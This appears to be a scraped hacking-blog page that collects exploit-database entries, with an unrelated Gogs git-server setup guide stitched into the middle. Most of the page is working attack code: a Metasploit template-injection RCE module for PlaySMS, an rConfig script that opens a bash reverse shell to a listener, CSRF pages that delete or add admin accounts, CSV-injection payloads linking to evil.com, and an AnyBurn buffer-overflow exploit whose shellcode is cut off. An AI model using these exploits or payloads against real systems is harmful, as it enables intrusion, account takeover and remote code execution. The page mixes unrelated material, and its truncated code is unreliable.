##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code
Execution',
'Description' => %q{
This module exploits a Preauth Server-Side Template Injection
leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
This issue is caused by Double processes a server-side template
by Custom PHP Template system called 'TPL'.
which is used in PlaySMS template engine location
src/Playsms/Tpl.php:_compile(). When Attacker supply username with a
malicious payload
and submit. This malicious payload first process by TPL and
save the value in the current template after this value goes for the second
process
which result in code execution.
The TPL(https://github.com/antonraharja/tpl) template language
is vulnerable to PHP code injection.
This module was tested against PlaySMS 1.4 on HackTheBox's
Forlic Machine.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit
Module
'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE','2020-8644'],
['URL','
https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_python'
},
'Privileged' => false,
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'python'
}
},
'Targets' =>
[
[ 'PlaySMS Before 1.4.3', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 05 2020'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path",
'/']),
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 &&
res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
#Send Payload in Login Request
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Send Payload in Username Field ......')
#Encoded in base64 to avoid HTML TAGS which is filter by Application.
evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64
-d |sh`}}"
# Send Payload with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => evil,
'password' => ''
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request") if res.nil?
# Request Status Check
if res.code == 302
print_good("Payload successfully Sent")
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes
Wrong")
end
end
def exploit
cookies = login
vprint_status("Cookies here : #{cookies}")
# Execute Last Sent Username.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
end
end
--
Touhid Shaikh
Exploit Researcher and Developer | Security Consultant
m: +91 7738794435
e: touhidshaikh22@gmail.com
www.touhidshaikh.com [image: Facebook icon]
<https://www.facebook.com/tauheeds1> [image: LinkedIn icon]
<https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon]
<https://twitter.com/touhidshaikh22> [image: Youtube icon]
<https://www.youtube.com/touhidshaikh22>
The content of this email is confidential and intended for the recipient
specified in message only. It is strictly forbidden to share any part of
this message with any third party, without a written consent of the sender.
If you received this message by mistake, please reply to this message and
follow with its deletion, so that we can ensure such a mistake does not
occur in the future.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863164253
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python3
# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection
# Date: 2020-03-10
# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity)
# Exploit Author: Abdullah - @i4bdullah
# Vendor Homepage: https://www.joomla.org/
# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip
# Version: 3.9.0 < 3.9.7
# Tested on: Ubuntu 18.04 LTS and Windows 7
# CVE : CVE-2019-12765
import mechanize
import sys
if (len(sys.argv) != 2):
print(f'Usage: {sys.argv[0]} <Base URL>')
print(f'Example: {sys.argv[0]} http://127.0.0.1 ')
sys.exit(1)
base_url = sys.argv[1]
reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101"
login_url = f"{base_url}/joomla/index.php?option=com_users"
def pwn(username='abdullah'):
payload = "=cmd|'/c calc.exe'!A1"
print(f"Registering a new user with the name <{payload}>...")
reg_form = mechanize.Browser()
reg_form.set_handle_robots(False)
reg_form.open(reg_url)
reg_form.select_form(nr=0)
reg_form.form['jform[name]'] = payload
reg_form.form['jform[username]'] = username
reg_form.form['jform[password1]'] = 'password'
reg_form.form['jform[password2]'] = 'password'
reg_form.form['jform[email1]'] = 'whatever@i4bdullah.com'
reg_form.form['jform[email2]'] = 'whatever@i4bdullah.com'
reg_form.submit()
print("The exploit ran successfully.")
print("Exiting...")
sys.exit(0)
pwn()
# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
# Date: 2020-03-10
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://www.wftpserver.com
# Version: v6.2.6
# Tested on: Windows 10
*Summary:*
An authenticated CSRF exists in web client and web administration of Wing
FTP v6.2.6, a crafted HTML page could delete admin user from the
application where as administration needs to re-install the program and add
admin user again. Issue was patched in v6.2.7.
*Proof of concept:*
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP:5466/admin_delete_admin.html" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="r" value="0.9219583354400562" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
*Patch (lua/cgiadmin.lua):*
URL: https://www.wftpserver.com/serverhistory.htm
local outfunc = "echo"
local function out (s, i, f)
s = string.sub(s, i, f or -1)
if s == "" then return s end
s = string.gsub(s, "([\\\n\'])", "\\%1")
s = string.gsub(s, "\r", "\\r")
return string.format(" %s('%s'); ", outfunc, s)
end
local function translate (s)
s = string.gsub(s, "<%%(.-)%%>", "<??lua %1 ??>")
local res = {}
local start = 1
while true do
local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[
\t]*(=?)(.-)%?%?>", start)
if not ip then break end
table.insert(res, out(s, start, ip-1))
if target ~= "" and target ~= "lua" then
table.insert(res, out(s, ip, fp))
else
if exp == "=" then
table.insert(res, string.format(" %s(%s);", outfunc, code))
else
table.insert(res, string.format(" %s ", code))
end
end
start = fp + 1
end
table.insert(res, out(s, start))
return table.concat(res)
end
local function compile (src, chunkname)
return loadstring(translate(src),chunkname)
end
function include (filename, env)
if incfiles[filename] == nil then
incfiles[filename] = true;
path = c_GetAppPath()
path = path .. "/webadmin/"..filename
local errstr = string.format("<b>The page '%s' does not
exist!</b>",filename)
local fh,_ = io.open (path)
if not fh then
echo_out = echo_out..errstr
return
end
local src = fh:read("*a")
fh:close()
local prog = compile(src, path)
local _env
if env then
_env = getfenv (prog)
setfenv (prog, env)
end
local status,err = pcall(prog)
if not status then
if type(err) == "string" and not string.find(err,"exit function!") then
print(string.format("some error in %s!",err))
end
return
end
end
end
function var_dump(var)
print("{")
if type(var) == "string" or type(var) == "number" or type(var) == "boolean"
or type(var) == "function" then
print(var)
elseif(type(var) == "thread") then
print("thread")
elseif(type(var) == "userdata") then
print("userdata")
elseif type(var) == "nil" then
print("nil")
elseif type(var) == "table" then
for k,v in pairs(var) do
if type(k) == "string" then k="'"..k.."'" end
if(type(v) == "string") then
print(k.."=>'"..v.."',")
elseif(type(v) == "number" or type(v) == "boolean") then
print(k.."=>"..tostring(v)..",")
elseif(type(v) == "function") then
print(k.."=>function,")
elseif(type(v) == "thread") then
print(k.."=>thread,")
elseif(type(v) == "userdata") then
print(k.."=>userdata,")
elseif(type(v) == "nil") then
print(k.."=>nil,")
elseif(type(v) == "table") then
print(k.."=>table,")
else
print(k.."=>object,")
end
end
else
print("object")
end
print("}")
end
function init_get()
local MatchedReferer = true
if _SESSION_ID ~= nil then
local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
if Referer ~= nil and Referer ~= "" then
local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
if Host ~= nil and Host ~= "" then
if string.sub(Referer,8,string.len(Host)+7) == Host or
string.sub(Referer,9,string.len(Host)+8) == Host then
MatchedReferer = true
else
MatchedReferer = false
exit()
end
end
else
MatchedReferer = false
end
end
string.gsub (urlparam, "([^&=]+)=([^&=]*)&?",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_GET,key,val)
else
rawset(_GET,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_GET,unescape(key),unescape(val))
else
--rawset(_GET,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
end
function init_post()
local MatchedReferer = true
if _SESSION_ID ~= nil then
local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
if Referer ~= nil and Referer ~= "" then
local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
if Host ~= nil and Host ~= "" then
if string.sub(Referer,8,string.len(Host)+7) == Host or
string.sub(Referer,9,string.len(Host)+8) == Host then
MatchedReferer = true
else
MatchedReferer = false
exit()
end
end
else
MatchedReferer = false
end
end
if
string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=")
then
string.gsub (strContent,
"[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_POST,key,val)
else
rawset(_POST,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_POST,unescape(key),unescape(val))
else
--rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
else
string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_POST,key,val)
else
rawset(_POST,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_POST,unescape(key),unescape(val))
else
--rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
end
end
function init_session()
if _COOKIE["UIDADMIN"] ~= nil then
_SESSION_ID = _COOKIE["UIDADMIN"]
SessionModule.load(_SESSION_ID)
end
end
function init_cookie()
local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)")
if cookiestr == nil or cookiestr == "" then return end
string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?",
function (key, val)
rawset(_COOKIE,unescape(key),unescape(val))
end
)
end
function setcookie(name,value,expire_secs)
if name == "UIDADMIN" then return end
local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT",
os.time()+3600*24*365)
_SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value..";
expires="..expiretime.."\r\n"
rawset(_COOKIE,name,value)
end
function getcookie(name)
if name == "UIDADMIN" then return end
return _COOKIE[name]
end
function deletecookie(name)
setcookie(name,"",-10000000)
end
function deleteallcookies()
for name,_ in pairs(_COOKIE) do
deletecookie(name)
end
end
local cookie_metatable =
{
__newindex = function(t,k,v)
setcookie(k,v,360000)
end
}
setmetatable(_COOKIE,cookie_metatable)
session_metatable =
{
__newindex = function(t,k,v)
if type(v) ~= "table" then
if k ~= nil then
k = string.gsub(k,"'","")
k = string.gsub(k,"\"","")
end
if v ~= nil then
--v = string.gsub(v,"%[","")
--v = string.gsub(v,"%]","")
end
rawset(_SESSION,k,v)
SessionModule.save(_SESSION_ID)
end
end
}
--setmetatable(_SESSION,session_metatable)
function init_all()
init_cookie()
init_session()
init_get()
init_post()
end
function setContentType(typestr)
_CONTENTTYPE = typestr
end
function exit()
error("exit function!")
end
At work, we need to submit our own code or project to our repository. Commonly used repositories include github gitee, etc. How to build your own private git repository?
About Gogs
Gogs, full name Go Git Service, is a Git service developed based on the Go language. It provides an interface and features similar to GitHub, allowing you to build a private Git repository and code hosting platform (similar to gitlab) on your own server. Its design and performance optimization make it suitable for small teams and individual developers. It has a web interface that allows you to easily manage and browse repositories, handle issues, conduct code reviews, and manage team members.
Features
Open Source Free: Gogs is released under the MIT license and can be used, modified and distributed for free. Lightweight: Gogs is written in Go, easy to deploy and run, and consumes less memory in terms of resource consumption. Fast and Stable: Gogs uses some performance optimization measures to improve its response speed and stability. Easy to use: Gogs has an intuitive user interface that allows users to quickly get started and perform version control and collaborative development. Integrated features: Gogs supports some common features, such as problem tracking, code review, web hooks, etc. Multiple database support: Gogs can be integrated with a variety of common databases, including SQLite, MySQL, PostgreSQL, etc. Support extensions: Gogs has a rich plug-in system that allows users to customize extensions according to their needs.
Installation
Here we take centos7 as an example to install it.
First, we need to install the mysql database. If the database is installed, just create the corresponding database.
Here we use the simplest yum command to install it
wget http://repo.mysql.com/mysql57-community-release-el7-8.noarch.rpm
rpm -ivh mysql57-community-release-el7-8.noarch.rpm
cd /etc/yum.repos.d/
yum install mysql-server --nogpgcheck installation, start the database
systemctl start mysqld 
Get temporary password
grep 'temporary password' /var/log/mysqld.log 
Log in with the temporary password you just obtained
mysql -u root -p 
Modify the root password
set password for root@localhost=password('666');ex Next, we create a database
create database git; At this point, the database configuration is completed. If yours is in a pagoda environment, just create a database in the pagoda.
Installing gogs
First go to the official website to download the binary package according to the corresponding system version 
wget https://dl.gogs.io/0.13.0/gogs_0.13.0_linux_amd64.zip
unzip gogs_0.13.0_linux_amd64.zipls
After the ./gogs web is completed, visit ip:3000 to enter the installer.
Fill in database information 
Basic configuration information 
Fill in pit errors and cannot be recognized 'git' command: exec: 'git': executable file not found in $PATH
We need the yum command to install git.
yum install git create account information 
After the configuration is complete, click Install Now. Wait for completion effect 
Login 
Create your own repository
Push local project to Gogs repository
Here, let's take idea as an example
IDEA opens an ready-made project and adds gogs remote repository 
After clicking OK, wait for download and install git.
After the installation is completed, the git menu bar will appear and click Manage Remote Address.
Synchronous Code
Select the project document - right-click git - submit and push 
At this point, we have configured our own private repository.
# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-03-11
# Vendor Homepage: https://www.asus.com/
# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
# Tested Version: 1.00.22
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """
ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe Auto
C:\>sc qc asHmComSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: asHmComSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ASUS HM Com Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-11
# Exploit Author: Ismail Akıcı
# Vendor Homepage: http://hrsale.com/
# Software Link : http://demo.hrsale.com/
# Software : HRSALE v1.1.8
# Product Version: v1.1.8
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# Description :
# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
# With this vulnerability, authorized users can be added to the system.
HTML CSRF PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
<input type="hidden" name="_user" value="1" />
<input type="hidden" name="csrf_hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
<input type="hidden" name="first_name" value="Ismail" />
<input type="hidden" name="last_name" value="Akici" />
<input type="hidden" name="company_id" value="1" />
<input type="hidden" name="location_id" value="1" />
<input type="hidden" name="username" value="ismailtakici" />
<input type="hidden" name="email" value="ismail.akici@gmail.com" />
<input type="hidden" name="date_of_birth" value="2020-03-11" />
<input type="hidden" name="contact_no" value="5554443322" />
<input type="hidden" name="employee_id" value="1" />
<input type="hidden" name="date_of_joining" value="2020-03-11" />
<input type="hidden" name="department_id" value="1" />
<input type="hidden" name="subdepartment_id" value="YES" />
<input type="hidden" name="designation_id" value="9" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="office_shift_id" value="1" />
<input type="hidden" name="password" value="Test1234!" />
<input type="hidden" name="confirm_password" value="Test1234!" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="leave_categories[]" value="0" />
<input type="hidden" name="leave_categories[]" value="1" />
<input type="hidden" name="address" value="Test Address" />
<input type="hidden" name="is_ajax" value="1" />
<input type="hidden" name="add_type" value="employee" />
<input type="hidden" name="form" value="add_employee" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
login = {
'user':user,
'pass':password,
'sublogin':'1'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
payload = {
'fileName':payload,
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'},verify=False)
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener."
else:
print "[-] Exploit failed, system is patched or credentials are wrong."
# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372
----Stored Cross-Site-Scripting-------------------
1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click in any of the other tabs
----CSV injection---------------------------------
1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)
2) Then we go to the page and introduce data, and the payload:
New booking:
Name: IMPORTANT DATA
Description: http://evil.com/evil.php
New booking:
Name: test
Description: =HYPERLINK(K2;H2)
This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
3) Then we go to Bookings List and export the CSV file
4) After that we open the file, and import data from an external file, using comma as separator
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
# Author: RedTeam Pentesting GmbH
# Date: 2020-03-11
# Vendor: https://www.watchguard.com
# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
# CVE: N/A
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.
Details
=======
Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."
"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your
network."
(from the vendor's homepage)
More Details
============
By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.
Proof of Concept
================
An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:
------------------------------------------------------------------------
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
{
"content": [
{
"id": 1,
"fullyQualifiedName": "example.com",
"logonDomain": "example.com",
"domainControllers": "dc1.example.com",
"username": "[DOMAIN_USER]",
"password": "[DOMAIN_PASSWORD]",
"uuid": "[...]",
"servers": [
{
[...]
}
]
}
],
"totalPages": 1,
"totalElements": 1,
"number": 0,
"numberOfElements": 1
}
------------------------------------------------------------------------
The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:
------------------------------------------------------------------------
jetty(winstone-5.8.5.10233-9.4.12.v20180830)
------------------------------------------------------------------------
It is likely that other versions of the AD Helper Component are
vulnerable as well.
Workaround
==========
Ensure API of the AD Helper Component is not reachable over the network,
for example by putting it behind a Firewall.
Fix
===
Update to Version 5.8.5.10317 or later.
Security Risk
=============
No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:
* Connect to the host
* Mount the share ADMIN$
* Create a file on the host
* Execute commands on the host
* Install software on the host
Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.
Timeline
========
2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released
References
==========
[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
# Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH)
# Date: 2020-03-09
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Authors: "Richard Davy/Gary Nield"
# Tested Version: 4.8 (32-bit)
# Tested on: Windows 10 Enterprise x64
# Vulnerability Type: Buffer Overflow/SEH/Unicode
# Steps to Produce the Exploit:
# 1.- Run python code
# 2.- Open payload.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to image file'
# 4.- Paste the content of payload.txt into the field: 'Select image file name'
# 5.- Click 'Create Now' and you will see a crash and the payload launch.
#!/usr/bin/env python
#Set overall payload size
crash_buffer_size = 10000
#nseh offset for SEH overwrite
nseh_offset = 9197
#location in payload where stack alignment returns to for payload
payloadret = 4459
#payload filler
junk = "\x71" * payloadret
#Payload generated via msfvenom, easily changeable as padding is auto calculated
#msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30"
buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50"
buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32"
buf += b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f"
buf += b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31"
buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c"
buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57"
buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54"
buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51"
buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59"
buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59"
buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b"
buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37"
buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b"
buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38"
buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54"
buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31"
buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53"
buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31"
buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51"
buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d"
buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d"
buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f"
buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36"
buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d"
